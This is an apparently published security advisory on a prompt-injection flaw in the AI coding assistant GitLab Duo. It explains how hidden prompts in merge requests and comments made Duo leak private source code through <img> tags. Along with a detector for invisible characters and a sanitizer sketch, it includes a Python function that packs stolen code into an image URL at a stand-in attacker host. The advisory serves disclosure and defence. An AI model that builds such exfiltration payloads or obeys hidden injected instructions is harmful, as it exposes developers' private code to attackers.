Severity
Medium
Analysis Summary
A critical remote prompt injection vulnerability was discovered in GitLab Duo, the AI-powered coding assistant integrated into GitLab’s DevSecOps platform, and publicly disclosed in February 2025. This flaw allowed attackers to manipulate Duo into leaking private source code and injecting untrusted HTML content into responses, potentially redirecting users to malicious websites. GitLab has since patched the issue, but the incident underscores the growing security concerns related to embedding large language model (LLM)-based assistants into sensitive development environments.
According to researchers, the exploit capitalized on Duo’s context-aware architecture, which parses entire project contents, including source code, comments, descriptions, and commit messages, to offer coding suggestions. Attackers leveraged this behavior by embedding hidden prompts in various parts of the project, such as merge request descriptions and issue comments. These instructions were obscured using sophisticated encoding techniques, including Unicode smuggling, Base16 encoding, and white text rendered with KaTeX, making them virtually invisible to human reviewers. The malicious payloads exploited multiple weaknesses identified in the 2025 OWASP Top 10 for LLMs, including LLM01 (Prompt Injection), LLM02 (Sensitive Information Disclosure), and LLM05 (Improper Output Handling), enabling manipulation of Duo’s output and undermining project integrity.
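To give a sense of how such hidden instructions can be caught before they reach an LLM, the sketch below scans user-supplied text (e.g. a merge request description or issue comment) for invisible code points commonly used in Unicode smuggling: zero-width characters and the Unicode "tag" block. This is an illustrative detector, not part of GitLab's tooling, and the character ranges are an assumption about which code points render invisibly while still being read by a model.

```python
import re

# Code points that render invisibly in most UIs but are still fed to an
# LLM when raw text enters its context window:
#   - zero-width spaces/joiners and the BOM (U+200B..U+200D, U+2060, U+FEFF)
#   - the Unicode "tag" block (U+E0000..U+E007F), a known smuggling channel
HIDDEN_CHARS = re.compile(
    r"[\u200b-\u200d\u2060\ufeff]"
    r"|[\U000E0000-\U000E007F]"
)

def find_hidden_payload(text: str) -> list[str]:
    """Return every invisible character found in user-supplied text."""
    return HIDDEN_CHARS.findall(text)
```

A reviewer-facing bot could run this over merge request descriptions and flag any non-empty result for human inspection, since legitimate project text rarely needs these code points.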
One of the most alarming aspects was the HTML injection vulnerability introduced by Duo’s real-time response rendering. Because the assistant streams markdown responses into HTML before parsing and sanitization are complete, a timing gap emerged that allowed attackers to inject executable HTML elements. Although GitLab used DOMPurify for sanitization, its configuration did not block tags such as <img>, <form>, and <a>. Researchers exploited this by embedding Base64-encoded private source code inside an <img> tag’s URL: when the tag rendered, the browser automatically sent a GET request to an attacker-controlled domain, exfiltrating sensitive data, including proprietary iOS source code and zero-day vulnerability details, without the user’s awareness.
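The exfiltration mechanics described above can be sketched in a few lines: encoding stolen text into the query string of an image URL means that merely rendering the tag makes the victim's browser issue a GET request carrying the data, with no click required. The domain below is hypothetical and used only for illustration.

```python
import base64

# Hypothetical attacker-controlled collection endpoint (illustration only).
ATTACKER = "https://collector.example.net/leak"

def build_exfil_img(secret_source: str) -> str:
    """Pack text into an <img> URL; rendering the tag triggers a GET
    request to the attacker's server with the payload in the query string."""
    payload = base64.urlsafe_b64encode(secret_source.encode()).decode()
    return f'<img src="{ATTACKER}?d={payload}">'
```

This is why the patch targets tags that fetch external resources: the request fires as a side effect of rendering, before the user can react.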
GitLab acknowledged the findings and, following responsible disclosure on February 12, 2025, released patch duo-ui!52, which prevents Duo from rendering unsafe HTML tags linking to external domains. This action effectively closed the exfiltration vector. However, the incident serves as a powerful warning: AI coding assistants are now part of the modern attack surface. As the researchers emphasized, any system that allows LLMs to process user-controlled input must assume all content is potentially malicious. The GitLab Duo case highlights the need for strong input validation, strict output sanitization, and isolation mechanisms to ensure LLMs do not become conduits for sensitive data exposure or supply chain compromise.
Impact
- Sensitive information theft
- Unauthorized access
Remediation
- Patched the vulnerability through update duo-ui!52, which blocks unsafe HTML tags that point to external domains (outside gitlab.com).
- Improved HTML sanitization by strengthening the use of DOMPurify to better filter out risky tags like <img>, <form>, and <a>.
- Limited Duo’s ability to process user-controlled content in a way that prevents hidden prompt injection from descriptions, comments, or commit messages.
- Addressed the streaming-based HTML rendering flaw to prevent malicious content from executing before sanitization completes.
- Prevented external data requests from being triggered by embedded Base64 payloads inside rendered content.
- Acknowledged the issue publicly and followed responsible disclosure practices to ensure transparency and a fast response.
- Reviewed AI assistant behavior to make sure it doesn’t leak sensitive data by blindly trusting context from project files.
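The core idea behind the duo-ui!52 fix, blocking risky tags that point off gitlab.com, can be illustrated with a minimal sanitizer. GitLab's actual patch works with DOMPurify in the Duo UI; this Python sketch only demonstrates the allowlist concept, and the tag set, attribute names, and trusted host are assumptions for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_HOST = "gitlab.com"          # assumption: only first-party links pass
RISKY_TAGS = {"img", "form", "a"}    # tags abused in the disclosed exploit

class ExternalLinkFilter(HTMLParser):
    """Strip risky tags whose src/href/action points off the trusted host;
    pass all other markup and text through unchanged."""

    def __init__(self):
        super().__init__()
        self.out = []

    def _is_external(self, attrs):
        for name, value in attrs:
            if name in ("src", "href", "action") and value:
                host = urlparse(value).netloc
                if host and host != TRUSTED_HOST:
                    return True
        return False

    def handle_starttag(self, tag, attrs):
        if tag in RISKY_TAGS and self._is_external(attrs):
            return  # drop the tag entirely
        self.out.append(self.get_starttag_text())

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # treat <img .../> like <img ...>

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

def sanitize(html: str) -> str:
    f = ExternalLinkFilter()
    f.feed(html)
    return "".join(f.out)
```

Note the asymmetry with a plain tag blocklist: a relative link or a link to the trusted host is kept, so legitimate in-product references still render while the exfiltration channel to external domains is cut.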